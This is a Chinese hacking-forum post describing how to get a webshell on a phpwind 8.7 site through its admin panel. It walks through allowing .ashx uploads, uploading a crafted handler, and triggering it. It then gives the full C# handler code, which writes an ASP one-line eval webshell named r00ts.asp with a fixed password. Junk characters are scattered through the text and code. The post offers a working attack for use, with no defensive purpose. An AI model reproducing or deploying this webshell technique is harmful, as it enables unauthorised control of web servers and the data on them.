找回密码
 立即注册
查看: 2730|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小& k$ e' x- z' j; D

1 ]( ?8 A3 C  w" r+ a. l群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
$ w2 c* s2 x! |- f6 g
/ H0 `! c7 A7 Q1 f发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整
1 Q2 V8 Y) ?" ` 0 z5 T) W6 X; b/ O# u+ D
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
5 ^0 J* _& D" e$ e' J) Z 6 s$ _, n2 F% K1 G. j  n  C+ y
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts9 M: K# ~& Z; _9 }

+ p1 k4 e% T; m4 ]下面是代码:" e6 r% W& p: N' y, Y8 \" e- Q1 r

- N; m8 `; T; ~  x<%@ WebHandler Language="C#"Class="Handler" %>
: @' j0 s, e" i2 [( R6 r: r- yusing System;
) I1 X( U5 q6 fusing System.Web;; s& E0 a. E8 K5 `/ [. {
using System.IO;; L2 ]: l8 ~) [6 X
public class Handler : IHttpHandler {
9 _1 a( e+ g1 k" f: Zpublic void ProcessRequest (HttpContext context) {
8 j2 ~( z& ~% @+ e2 B' |1 r! H! ~context.Response.ContentType = "text/plain";
/ ]* J! Y. h8 n1 U; sStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));- H8 a8 `% K3 L# Q( X
file1.Write("<%eval request(\"r00ts\")%>");. ?; Z/ T& o$ x# h5 T. r$ b& x. [
file1.Flush();- X7 S1 r( b/ h9 J- S5 B4 U& ]
file1.Close();$ ]/ u5 T; {" G; j" ?1 B
}
" P& H% p4 n( t+ B% ~( A6 kpublic bool IsReusable {
2 D( ?/ E5 r9 {. k. a& ^& Gget {8 `/ n# \; A% f5 y, p! F
return false;' ~0 p2 S+ W( y3 h
}
/ m" B6 H9 s2 ]2 @: |$ t/ T6 V}: {) n" |9 h" H9 ]
}
: u6 P- `  c% s: d. B3 _
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表